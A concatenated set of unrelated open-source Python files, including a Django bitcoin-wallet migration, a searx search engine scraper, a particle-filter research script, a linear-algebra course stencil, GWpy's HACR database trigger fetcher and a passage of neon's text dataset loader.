self.gf('django.db.models.fields.CharField')(max_length=100, null=True, blank=True),
keep_default=False)
# Adding field 'WalletTransaction.txid'
db.add_column('django_bitcoin_wallettransaction', 'txid',
self.gf('django.db.models.fields.CharField')(max_length=100, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'DepositTransaction.confirmations'
db.delete_column('django_bitcoin_deposittransaction', 'confirmations')
# Deleting field 'DepositTransaction.txid'
db.delete_column('django_bitcoin_deposittransaction', 'txid')
# Deleting field 'WalletTransaction.txid'
db.delete_column('django_bitcoin_wallettransaction', 'txid')
models = {
'django_bitcoin.bitcoinaddress': {
'Meta': {'object_name': 'BitcoinAddress'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'address': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '50', 'null': 'True', 'blank': 'True'}),
'least_received': ('django.db.models.fields.DecimalField', [], {'default': "'0'", 'max_digits': '16', 'decimal_places': '8'}),
'least_received_confirmed': ('django.db.models.fields.DecimalField', [], {'default': "'0'", 'max_digits': '16', 'decimal_places': '8'}),
'wallet': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'addresses'", 'null': 'True', 'to': "orm['django_bitcoin.Wallet']"})
},
'django_bitcoin.deposittransaction': {
'Meta': {'object_name': 'DepositTransaction'},
'address': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['django_bitcoin.BitcoinAddress']"}),
'amount': ('django.db.models.fields.DecimalField', [], {'default': "'0'", 'max_digits': '16', 'decimal_places': '8'}),
'confirmations': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'txid': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'wallet': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['django_bitcoin.Wallet']"})
},
'django_bitcoin.historicalprice': {
'Meta': {'object_name': 'HistoricalPrice'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'currency': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'params': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'price': ('django.db.models.fields.DecimalField', [], {'max_digits': '16', 'decimal_places': '2'})
},
'django_bitcoin.payment': {
'Meta': {'object_name': 'Payment'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'address': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'amount': ('django.db.models.fields.DecimalField', [], {'default': "'0.0'", 'max_digits': '16', 'decimal_places': '8'}),
'amount_paid': ('django.db.models.fields.DecimalField', [], {'default': "'0.0'", 'max_digits': '16', 'decimal_places': '8'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'paid_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'transactions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['django_bitcoin.Transaction']", 'symmetrical': 'False'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {}),
'withdrawn_total': ('django.db.models.fields.DecimalField', [], {'default': "'0.0'", 'max_digits': '16', 'decimal_places': '8'})
},
'django_bitcoin.transaction': {
'Meta': {'object_name': 'Transaction'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'amount': ('django.db.models.fields.DecimalField', [], {'default': "'0.0'", 'max_digits': '16', 'decimal_places': '8'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'django_bitcoin.wallet': {
'Meta': {'object_name': 'Wallet'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'last_balance': ('django.db.models.fields.DecimalField', [], {'default': "'0'", 'max_digits': '16', 'decimal_places': '8'}),
'transaction_counter': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'transactions_with': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['django_bitcoin.Wallet']", 'through': "orm['django_bitcoin.WalletTransaction']", 'symmetrical': 'False'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
'django_bitcoin.wallettransaction': {
'Meta': {'object_name': 'WalletTransaction'},
'amount': ('django.db.models.fields.DecimalField', [], {'default': "'0.0'", 'max_digits': '16', 'decimal_places': '8'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'from_wallet': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sent_transactions'", 'to': "orm['django_bitcoin.Wallet']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'to_bitcoinaddress': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'to_wallet': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'received_transactions'", 'null': 'True', 'to': "orm['django_bitcoin.Wallet']"}),
'txid': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['django_bitcoin']
|
FuzzyHobbit/django-bitcoin
|
django_bitcoin/migrations/0010_auto__add_field_deposittransaction_confirmations__add_field_deposittra.py
|
Python
|
mit
| 8,069
|
from urllib import urlencode
from HTMLParser import HTMLParser
url = 'http://www.filecrop.com/'
search_url = url + '/search.php?{query}&size_i=0&size_f=100000000&engine_r=1&engine_d=1&engine_e=1&engine_4=1&engine_m=1&pos={index}' # noqa
paging = True
class FilecropResultParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self.__start_processing = False
self.results = []
self.result = {}
self.tr_counter = 0
self.data_counter = 0
def handle_starttag(self, tag, attrs):
if tag == 'tr':
if ('bgcolor', '#edeff5') in attrs or\
('bgcolor', '#ffffff') in attrs:
self.__start_processing = True
if not self.__start_processing:
return
if tag == 'label':
self.result['title'] = [attr[1] for attr in attrs
if attr[0] == 'title'][0]
elif tag == 'a' and ('rel', 'nofollow') in attrs\
and ('class', 'sourcelink') in attrs:
if 'content' in self.result:
self.result['content'] += [attr[1] for attr in attrs
if attr[0] == 'title'][0]
else:
self.result['content'] = [attr[1] for attr in attrs
if attr[0] == 'title'][0]
self.result['content'] += ' '
elif tag == 'a':
self.result['url'] = url + [attr[1] for attr in attrs
if attr[0] == 'href'][0]
def handle_endtag(self, tag):
if self.__start_processing is False:
return
if tag == 'tr':
self.tr_counter += 1
if self.tr_counter == 2:
self.__start_processing = False
self.tr_counter = 0
self.data_counter = 0
self.results.append(self.result)
self.result = {}
def handle_data(self, data):
if not self.__start_processing:
return
if 'content' in self.result:
self.result['content'] += data + ' '
else:
self.result['content'] = data + ' '
self.data_counter += 1
def request(query, params):
index = 1 + (params['pageno'] - 1) * 30
params['url'] = search_url.format(query=urlencode({'w': query}),
index=index)
return params
def response(resp):
parser = FilecropResultParser()
parser.feed(resp.text)
return parser.results
|
PwnArt1st/searx
|
searx/engines/filecrop.py
|
Python
|
agpl-3.0
| 2,573
|
##############################################################################
##############################################################################
#
# Replicates results in section 4.2
#
# J. Dahlin, F. Lindsten, J. Kronander and T. B. Schön,
# Accelerating pmMH by correlating auxiliary variables.
# Pre-print, arXiv:1512:05483v1, 2015.
#
# Copyright (c) 2016 Johan Dahlin [ johan.dahlin (at) liu.se ]
# Distributed under the MIT license.
#
##############################################################################
##############################################################################
import numpy as np
import Quandl
from state import smc
from para import pmh_correlatedRVs
from models import hwsv_4parameters
##############################################################################
# Arrange the data structures
##############################################################################
pmh = pmh_correlatedRVs.stcPMH();
##############################################################################
# Arrange the data structures
##############################################################################
sm = smc.smcSampler();
pmh = pmh_correlatedRVs.stcPMH();
##############################################################################
# Setup the system
##############################################################################
sys = hwsv_4parameters.ssm()
sys.par = np.zeros((sys.nPar,1))
sys.par[0] = 0.00;
sys.par[1] = 0.98;
sys.par[2] = 0.16;
sys.par[3] = -0.70;
sys.T = 748;
sys.xo = 0.0;
sys.version = "standard"
##############################################################################
# Generate data
##############################################################################
sys.generateData();
d = Quandl.get("NASDAQOMX/OMXS30", trim_start="2011-01-02", trim_end="2014-01-02")
y = 100.0 * np.diff(np.log(d['Index Value']))
sys.y = y[~np.isnan(y)]
##############################################################################
# Setup the parameters
##############################################################################
th = hwsv_4parameters.ssm()
th.nParInference = 4;
th.copyData(sys);
##############################################################################
# Setup the SMC algorithm
##############################################################################
sm.filter = sm.bPFrv;
sm.sortParticles = True;
sm.nPart = 50;
sm.resampFactor = 2.0;
sm.genInitialState = True;
##############################################################################
# Check correlation in the likelihood estimator
##############################################################################
nIter = 600;
ll0 = np.zeros( nIter )
ll1 = np.zeros( nIter )
pmh.rvpGlobal = 0.0;
sigmauGrid = np.arange( 0.00,1.05,0.05 );
nPartGrid = ( 1, 2, 5, 10, 20, 50 )
covPMH = np.zeros( ( len(sigmauGrid), len(nPartGrid), 3 ) )
for ii in range(len(sigmauGrid)):
pmh.sigmaU = sigmauGrid[ii];
pmh.alpha = 0.0;
for jj in range( len(nPartGrid) ):
sm.nPart = nPartGrid[jj];
pmh.rvnSamples = 1 + sm.nPart;
for kk in range(nIter):
# Sample initial random variables and compute likelihood estimate
pmh.rv = np.random.normal( size=( pmh.rvnSamples, sys.T ) );
sm.rv = pmh.rv;
sm.filter( th );
ll0[ kk ] = sm.ll;
# Propose new random variables ( Local move )
u = np.random.uniform()
pmh.rvp = np.sqrt( 1.0 - pmh.sigmaU**2 ) * pmh.rv + pmh.sigmaU * np.random.normal( size=(pmh.rvnSamples,sys.T) );
# Compute likelihood estimate
sm.rv = pmh.rvp;
sm.filter( th );
ll1[ kk ] = sm.ll;
covPMH[ii,jj,0] = np.var( ll0 )
covPMH[ii,jj,1] = np.cov( ll0, ll1 )[0,1]
covPMH[ii,jj,2] = np.corrcoef( ll0, ll1 )[0,1]
print( (ii,len(sigmauGrid),jj,len(nPartGrid) ) );
figure(1)
for jj in range( len(nPartGrid) ):
plot(sigmauGrid,covPMH[:,jj,2])
#
import pandas
fileOut = pandas.DataFrame( covPMH[:,:,0],index=sigmauGrid, columns=nPartGrid);
fileOut.to_csv('example3-correlation-versus-sigmau-llvar.csv');
fileOut = pandas.DataFrame( covPMH[:,:,1],index=sigmauGrid, columns=nPartGrid);
fileOut.to_csv('example3-correlation-versus-sigmau-llcov.csv');
fileOut = pandas.DataFrame( covPMH[:,:,2],index=sigmauGrid, columns=nPartGrid);
fileOut.to_csv('example3-correlation-versus-sigmau-llcorr.csv');
#sqrt( var( ll0 ) )
########################################################################
# End of file
########################################################################
|
compops/pmmh-correlated2015
|
scripts-draft1/example2-correlation-versus-sigmau.py
|
Python
|
gpl-3.0
| 4,940
|
# version code 24ea27739109+
coursera = 1
# Please fill out this stencil and submit using the provided submission script.
# Copyright 2013 Philip N. Klein
def getitem(v,k):
"""
Return the value of entry k in v.
Be sure getitem(v,k) returns 0 if k is not represented in v.f.
>>> v = Vec({'a','b','c', 'd'},{'a':2,'c':1,'d':3})
>>> v['d']
3
>>> v['b']
0
"""
pass
def setitem(v,k,val):
"""
Set the element of v with label d to be val.
setitem(v,d,val) should set the value for key d even if d
is not previously represented in v.f.
>>> v = Vec({'a', 'b', 'c'}, {'b':0})
>>> v['b'] = 5
>>> v['b']
5
>>> v['a'] = 1
>>> v['a']
1
>>> v['a'] = 0
>>> v['a']
0
"""
pass
def equal(u,v):
"""
Return true iff u is equal to v.
Because of sparse representation, it is not enough to compare dictionaries
>>> Vec({'a', 'b', 'c'}, {'a':0}) == Vec({'a', 'b', 'c'}, {'b':0})
True
Be sure that equal(u, v) check equalities for all keys from u.f and v.f even if
some keys in u.f do not exist in v.f (or vice versa)
>>> Vec({'x','y','z'},{'y':1,'x':2}) == Vec({'x','y','z'},{'y':1,'z':0})
False
>>> Vec({'a','b','c'}, {'a':0,'c':1}) == Vec({'a','b','c'}, {'a':0,'c':1,'b':4})
False
>>> Vec({'a','b','c'}, {'a':0,'c':1,'b':4}) == Vec({'a','b','c'}, {'a':0,'c':1})
False
The keys matter:
>>> Vec({'a','b'},{'a':1}) == Vec({'a','b'},{'b':1})
False
The values matter:
>>> Vec({'a','b'},{'a':1}) == Vec({'a','b'},{'a':2})
False
"""
assert u.D == v.D
pass
def add(u,v):
"""
Returns the sum of the two vectors.
Make sure to add together values for all keys from u.f and v.f even if some keys in u.f do not
exist in v.f (or vice versa)
>>> a = Vec({'a','e','i','o','u'}, {'a':0,'e':1,'i':2})
>>> b = Vec({'a','e','i','o','u'}, {'o':4,'u':7})
>>> c = Vec({'a','e','i','o','u'}, {'a':0,'e':1,'i':2,'o':4,'u':7})
>>> a + b == c
True
>>> a == Vec({'a','e','i','o','u'}, {'a':0,'e':1,'i':2})
True
>>> b == Vec({'a','e','i','o','u'}, {'o':4,'u':7})
True
>>> d = Vec({'x','y','z'}, {'x':2,'y':1})
>>> e = Vec({'x','y','z'}, {'z':4,'y':-1})
>>> f = Vec({'x','y','z'}, {'x':2,'y':0,'z':4})
>>> d + e == f
True
>>> b + Vec({'a','e','i','o','u'}, {}) == b
True
"""
assert u.D == v.D
pass
def dot(u,v):
"""
Returns the dot product of the two vectors.
>>> u1 = Vec({'a','b'}, {'a':1, 'b':2})
>>> u2 = Vec({'a','b'}, {'b':2, 'a':1})
>>> u1*u2
5
>>> u1 == Vec({'a','b'}, {'a':1, 'b':2})
True
>>> u2 == Vec({'a','b'}, {'b':2, 'a':1})
True
>>> v1 = Vec({'p','q','r','s'}, {'p':2,'s':3,'q':-1,'r':0})
>>> v2 = Vec({'p','q','r','s'}, {'p':-2,'r':5})
>>> v1*v2
-4
>>> w1 = Vec({'a','b','c'}, {'a':2,'b':3,'c':4})
>>> w2 = Vec({'a','b','c'}, {'a':12,'b':8,'c':6})
>>> w1*w2
72
The pairwise products should not be collected in a set before summing
because a set eliminates duplicates
>>> v1 = Vec({1, 2}, {1 : 3, 2 : 6})
>>> v2 = Vec({1, 2}, {1 : 2, 2 : 1})
>>> v1 * v2
12
"""
assert u.D == v.D
pass
def scalar_mul(v, alpha):
"""
Returns the scalar-vector product alpha times v.
>>> zero = Vec({'x','y','z','w'}, {})
>>> u = Vec({'x','y','z','w'},{'x':1,'y':2,'z':3,'w':4})
>>> 0*u == zero
True
>>> 1*u == u
True
>>> 0.5*u == Vec({'x','y','z','w'},{'x':0.5,'y':1,'z':1.5,'w':2})
True
>>> u == Vec({'x','y','z','w'},{'x':1,'y':2,'z':3,'w':4})
True
"""
pass
def neg(v):
"""
Returns the negation of a vector.
>>> u = Vec({2,4,6,8},{2:1,4:2,6:3,8:4})
>>> -u
Vec({8, 2, 4, 6},{8: -4, 2: -1, 4: -2, 6: -3})
>>> u == Vec({2,4,6,8},{2:1,4:2,6:3,8:4})
True
>>> -Vec({'a','b','c'}, {'a':1}) == Vec({'a','b','c'}, {'a':-1})
True
"""
pass
###############################################################################################################################
class Vec:
"""
A vector has two fields:
D - the domain (a set)
f - a dictionary mapping (some) domain elements to field elements
elements of D not appearing in f are implicitly mapped to zero
"""
def __init__(self, labels, function):
self.D = labels
self.f = function
__getitem__ = getitem
__setitem__ = setitem
__neg__ = neg
__rmul__ = scalar_mul #if left arg of * is primitive, assume it's a scalar
def __mul__(self,other):
#If other is a vector, returns the dot product of self and other
if isinstance(other, Vec):
return dot(self,other)
else:
return NotImplemented # Will cause other.__rmul__(self) to be invoked
def __truediv__(self,other): # Scalar division
return (1/other)*self
__add__ = add
def __radd__(self, other):
"Hack to allow sum(...) to work with vectors"
if other == 0:
return self
def __sub__(a,b):
"Returns a vector which is the difference of a and b."
return a+(-b)
__eq__ = equal
def is_almost_zero(self):
s = 0
for x in self.f.values():
if isinstance(x, int) or isinstance(x, float):
s += x*x
elif isinstance(x, complex):
s += x*x.conjugate()
else: return False
return s < 1e-20
def __str__(v):
"pretty-printing"
D_list = sorted(v.D, key=repr)
numdec = 3
wd = dict([(k,(1+max(len(str(k)), len('{0:.{1}G}'.format(v[k], numdec))))) if isinstance(v[k], int) or isinstance(v[k], float) else (k,(1+max(len(str(k)), len(str(v[k]))))) for k in D_list])
s1 = ''.join(['{0:>{1}}'.format(str(k),wd[k]) for k in D_list])
s2 = ''.join(['{0:>{1}.{2}G}'.format(v[k],wd[k],numdec) if isinstance(v[k], int) or isinstance(v[k], float) else '{0:>{1}}'.format(v[k], wd[k]) for k in D_list])
return "\n" + s1 + "\n" + '-'*sum(wd.values()) +"\n" + s2
def __hash__(self):
"Here we pretend Vecs are immutable so we can form sets of them"
h = hash(frozenset(self.D))
for k,v in sorted(self.f.items(), key = lambda x:repr(x[0])):
if v != 0:
h = hash((h, hash(v)))
return h
def __repr__(self):
return "Vec(" + str(self.D) + "," + str(self.f) + ")"
def copy(self):
"Don't make a new copy of the domain D"
return Vec(self.D, self.f.copy())
|
josiah14/linear-algebra
|
programming-the-matrix/1-week/vec/vec.py
|
Python
|
mit
| 6,607
|
from engine import Engine
e = Engine()
e.add_player()
e.update_velocity('red', (1, 1))
|
vhp-jjh/online-tag
|
test_engine.py
|
Python
|
mit
| 87
|
from binary_tree import Node
class ConstructTreeFromInorderPreOrder:
def __init__(self):
self.index = 0
def _createTree(self, inorder, preorder, start, end):
if start > end:
return None
i = 0
for i in range(start, end + 1):
if preorder[self.index] == inorder[i]:
break
node = Node.newNode(preorder[self.index])
self.index += 1
node.left = self._createTree(inorder, preorder, start, i - 1)
node.right = self._createTree(inorder, preorder, i + 1, end)
return node
def createTree(self, inorder, preorder):
return self._createTree(inorder, preorder, 0, len(inorder) - 1)
|
mission-peace/interview
|
python/tree/construct_tree_from_inorder_preorder.py
|
Python
|
apache-2.0
| 704
|
import sys
import string
f = sys.stdin
g = sys.stdout
echo = 0
while 1:
l = f.readline()
if not l: break
ll=string.strip(l)
if ll=='BEGIN-LOG':
echo = 1
elif ll=='END-LOG':
echo = 0
elif echo:
l=string.replace(l,"-0.000"," 0.000") # squish annoying negative zeros
g.write(l)
|
gratefulfrog/lib
|
python/pymol/pymol_path/test/trim.py
|
Python
|
gpl-2.0
| 319
|
# -*- coding: utf-8 -*-
# Copyright (C) Duncan Macleod (2014-2020)
#
# This file is part of GWpy.
#
# GWpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GWpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GWpy. If not, see <http://www.gnu.org/licenses/>.
"""Input/output methods for tabular data.
Access to HACR triggers requires local access to the MySQL database. Users
can set the IP address of the server, and the username and password for
connections in the following environment variables
- ``HACR_DATABASE_SERVER``
- ``HACR_DATABASE_USER``
- ``HACR_DATABASE_PASSWD``
These can also be given directly to the connection function as keyword
arguments
"""
import os.path
from dateutil.relativedelta import relativedelta
from ...segments import Segment
from ...time import (to_gps, from_gps)
from .. import EventTable
from .fetch import register_fetcher
from .sql import format_db_selection
__author__ = 'Duncan Macleod <duncan.macleod@ligo.org>'
# get HACR environment variables
HACR_DATABASE_SERVER = os.getenv('HACR_DATABASE_SERVER', None)
HACR_DATABASE_USER = os.getenv('HACR_DATABASE_USER', None)
HACR_DATABASE_PASSWD = os.getenv('HACR_DATABASE_PASSWD', None)
HACR_COLUMNS = [
'gps_start',
'gps_offset',
'freq_central',
'bandwidth',
'duration',
'num_pixels',
'snr',
'totPower',
]
def get_database_names(start, end):
# convert to datetimes
start = from_gps(to_gps(start))
end = from_gps(to_gps(end))
# loop over months
dbs = []
d = start
dt = relativedelta(months=1)
while d < end:
dbs.append('geo%s' % d.strftime('%Y%m'))
d += dt
return dbs
def get_hacr_channels(db=None, gps=None, connection=None,
**conectkwargs):
"""Return the names of all channels present in the given HACR database
"""
# connect if needed
if connection is None:
if gps is None:
gps = from_gps('now')
if db is None:
db = get_database_names(gps, gps)[0]
connection = connect(db=db, **conectkwargs)
# query
out = query("select channel from job where monitorName = 'chacr'")
return [r[0] for r in out]
def get_hacr_triggers(channel, start, end, columns=HACR_COLUMNS, pid=None,
monitor='chacr', selection=None, **connectkwargs):
"""Fetch a table of HACR triggers in the given interval
"""
if columns is None:
columns = HACR_COLUMNS
columns = list(columns)
span = Segment(*map(to_gps, (start, end)))
# parse selection for SQL query (removing leading 'where ')
selectionstr = 'and %s' % format_db_selection(selection, engine=None)[6:]
# get database names and loop over each on
databases = get_database_names(start, end)
rows = []
for db in databases:
conn = connect(db, **connectkwargs)
cursor = conn.cursor()
# find process ID(s) for this channel
pids = query("select process_id, gps_start, gps_stop "
"from job where monitorName = %r and channel = %r"
% (monitor, str(channel)), connection=conn)
for p, s, e in pids:
# validate this process id
if pid is not None and int(p) != int(pid):
continue
tspan = Segment(float(s), float(e))
if not tspan.intersects(span):
continue
# execute trigger query
q = ('select %s from mhacr where process_id = %d and '
'gps_start > %s and gps_start < %d %s order by gps_start asc'
% (', '.join(columns), int(p), span[0], span[1],
selectionstr))
n = cursor.execute(q)
if n == 0:
continue
# get new events, convert to recarray, and append to table
rows.extend(cursor.fetchall())
return EventTable(rows=rows, names=columns)
register_fetcher('hacr', EventTable, get_hacr_triggers,
usage="channel, gpsstart, gpstop")
# -- utilities ----------------------------------------------------------------
def connect(db, host=HACR_DATABASE_SERVER, user=HACR_DATABASE_USER,
passwd=HACR_DATABASE_PASSWD):
"""Connect to the given SQL database
"""
try:
import pymysql
except ImportError as e:
e.args = ('pymysql is required to fetch HACR triggers',)
raise
return pymysql.connect(host=host, user=user, passwd=passwd, db=db)
def query(querystr, connection=None, **connectkwargs):
"""Execute a query of the given SQL database
"""
if connection is None:
connection = connect(**connectkwargs)
cursor = connection.cursor()
cursor.execute(querystr)
return cursor.fetchall()
|
gwpy/gwpy
|
gwpy/table/io/hacr.py
|
Python
|
gpl-3.0
| 5,205
|
# ******************************************************************************
# Copyright 2017-2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ******************************************************************************
"""
Defines text datatset handling.
"""
import logging
import numpy as np
import os
import h5py
from neon.data.dataiterator import NervanaDataIterator, ArrayIterator
from neon.data.datasets import Dataset
from neon.data.text_preprocessing import pad_sentences, pad_data
logger = logging.getLogger(__name__)
class Text(NervanaDataIterator):
"""
This class defines methods for loading and iterating over text datasets.
"""
def __init__(self, time_steps, path, vocab=None, tokenizer=None,
onehot_input=True, reverse_target=False, get_prev_target=False):
"""
Construct a text dataset object.
Arguments:
time_steps (int) : Length of a sequence.
path (str) : Path to text file.
vocab (python.set) : A set of unique tokens.
tokenizer (function) : Tokenizer function.
onehot_input (boolean): One-hot representation of input
reverse_target (boolean): for sequence to sequence models, set to
True to reverse target sequence. Also
disables shifting target by one.
get_prev_target (boolean): for sequence to sequence models, set to
True for training data to provide correct
target from previous time step as decoder
input. If condition, shape will be a tuple
of shapes, corresponding to encoder and
decoder inputs.
"""
super(Text, self).__init__(name=None)
self.seq_length = time_steps
self.onehot_input = onehot_input
self.batch_index = 0
self.reverse_target = reverse_target
self.get_prev_target = get_prev_target
X, y = self._get_data(path, tokenizer, vocab)
# reshape to preserve sentence continuity across batches
self.X = X.reshape(self.be.bsz, self.nbatches, time_steps)
self.y = y.reshape(self.be.bsz, self.nbatches, time_steps)
# stuff below this comment needs to be cleaned up and commented
self.nout = self.nclass
if self.onehot_input:
self.shape = (self.nout, time_steps)
self.dev_X = self.be.iobuf((self.nout, time_steps))
if self.get_prev_target:
self.dev_Z = self.be.iobuf((self.nout, time_steps))
else:
self.shape = (time_steps, 1)
self.dev_X = self.be.iobuf(time_steps, dtype=np.int32)
if self.get_prev_target:
self.dev_Z = self.be.iobuf(time_steps, dtype=np.int32)
self.decoder_shape = self.shape
self.dev_y = self.be.iobuf((self.nout, time_steps))
self.dev_lbl = self.be.iobuf(time_steps, dtype=np.int32)
self.dev_lblflat = self.dev_lbl.reshape((1, -1))
def _get_data(self, path, tokenizer, vocab):
text = open(path).read()
tokens = self.get_tokens(text, tokenizer)
# make this a static method
extra_tokens = len(tokens) % (self.be.bsz * self.seq_length)
if extra_tokens:
tokens = tokens[:-extra_tokens]
self.nbatches = len(tokens) // (self.be.bsz * self.seq_length)
self.ndata = self.nbatches * self.be.bsz # no leftovers
self.vocab = sorted(self.get_vocab(tokens, vocab))
self.nclass = len(self.vocab)
# vocab dicts
self.token_to_index = dict((t, i) for i, t in enumerate(self.vocab))
self.index_to_token = dict((i, t) for i, t in enumerate(self.vocab))
# map tokens to indices
X = np.asarray([self.token_to_index[t] for t in tokens], dtype=np.uint32)
if self.reverse_target:
y = X.copy()
else:
y = np.concatenate((X[1:], X[:1]))
return X, y
@staticmethod
def create_valid_file(path, valid_split=0.1):
"""
Create separate files for training and validation.
Arguments:
path(str): Path to data file.
valid_split(float, optional): Fraction of data to set aside for validation.
Returns:
str, str : Paths to train file and validation file
"""
text = open(path).read()
# create train and valid paths
filename, ext = os.path.splitext(path)
train_path = filename + '_train' + ext
valid_path = filename + '_valid' + ext
# split data
train_split = int(len(text) * (1 - valid_split))
train_text = text[:train_split]
valid_text = text[train_split:]
# write train file
with open(train_path, 'w') as train_file:
train_file.write(train_text)
# write valid file
with open(valid_path, 'w') as valid_file:
valid_file.write(valid_text)
return train_path, valid_path
@staticmethod
def get_tokens(string, tokenizer=None):
"""
Map string to a list of tokens.
Arguments:
string(str): String to be tokenized.
token(object): Tokenizer object.
tokenizer (function) : Tokenizer function.
Returns:
list : A list of tokens
"""
# (if tokenizer is None, we have a list of characters)
if tokenizer is None:
return string
else:
return tokenizer(string)
@staticmethod
def get_vocab(tokens, vocab=None):
"""
Construct vocabulary from the given tokens.
Arguments:
tokens(list): List of tokens.
vocab: (Default value = None)
Returns:
python.set : A set of unique tokens
"""
# (if vocab is not None, we check that it contains all tokens)
if vocab is None:
return set(tokens)
else:
vocab = set(vocab)
assert vocab >= set(tokens), "the predefined vocab must contain all the tokens"
return vocab
@staticmethod
def pad_sentences(sentences, sentence_length=None, dtype=np.int32, pad_val=0.):
"""
Deprecated, use neon.data.text_preprocessing.pad_sentences.
"""
logger.error('pad_sentences in the Text class is deprecated. This function '
'is now in neon.data.text_preprocessing.')
return pad_sentences(sentences,
sentence_length=sentence_length,
dtype=dtype,
pad_val=pad_val)
@staticmethod
def pad_data(path, vocab_size=20000, sentence_length=100, oov=2,
start=1, index_from=3, seed=113, test_split=0.2):
"""
Deprecated, use neon.data.text_preprocessing.pad_data.
"""
logger.error('pad_data in the Text class is deprecated. This function'
'is now in neon.data.text_preprocessing')
return pad_data(path,
vocab_size=vocab_size,
sentence_length=sentence_length,
oov=oov,
start=start,
index_from=index_from,
seed=seed,
test_split=test_split)
def reset(self):
"""
Reset the starting index of this dataset back to zero.
Relevant for when one wants to call repeated evaluations on the dataset
but don't want to wrap around for the last uneven minibatch
Not necessary when ndata is divisible by batch size
"""
self.batch_index = 0
def __iter__(self):
"""
Generator that can be used to iterate over this dataset.
Yields:
tuple : the next minibatch of data.
"""
self.batch_index = 0
while self.batch_index < self.nbatches:
X_batch = self.X[:, self.batch_index, :].T.astype(np.float32, order='C')
if self.reverse_target is False:
y_batch = self.y[:, self.batch_index, :].T.astype(np.float32, order='C')
else:
# reverse target sequence
y_batch = self.y[:, self.batch_index, ::-1].T.astype(np.float32, order='C')
self.dev_lbl.set(y_batch)
self.dev_y[:] = self.be.onehot(self.dev_lblflat, axis=0)
if self.onehot_input:
self.dev_lbl.set(X_batch)
self.dev_X[:] = self.be.onehot(self.dev_lblflat, axis=0)
if self.get_prev_target:
self.dev_Z[:, self.be.bsz:] = self.dev_y[:, :-self.be.bsz]
self.dev_Z[:, 0:self.be.bsz] = 0 # zero-hot, no input
else:
self.dev_X.set(X_batch)
if self.get_prev_target:
self.dev_lbl.set(y_batch)
self.dev_Z[1:, :] = self.dev_lbl[:-1, :]
self.dev_Z[0, :] = 0
self.batch_index += 1
if self.get_prev_target:
yield (self.dev_X, self.dev_Z), self.dev_y
else:
yield self.dev_X, self.dev_y
class TextNMT(Text):
"""
Datasets for neural machine translation on French / English bilingual datasets.
Available at http://www-lium.univ-lemans.fr/~schwenk/cslm_joint_paper/data/bitexts.tgz
Arguments:
time_steps (int) : Length of a sequence.
path (str) : Path to text file.
tokenizer (function) : Tokenizer function.
onehot_input (boolean): One-hot representation of input
get_prev_target (boolean): for sequence to sequence models, set to
True for training data to provide correct
target from previous time step as decoder
input. If condition, shape will be a tuple
of shapes, corresponding to encoder and
decoder inputs.
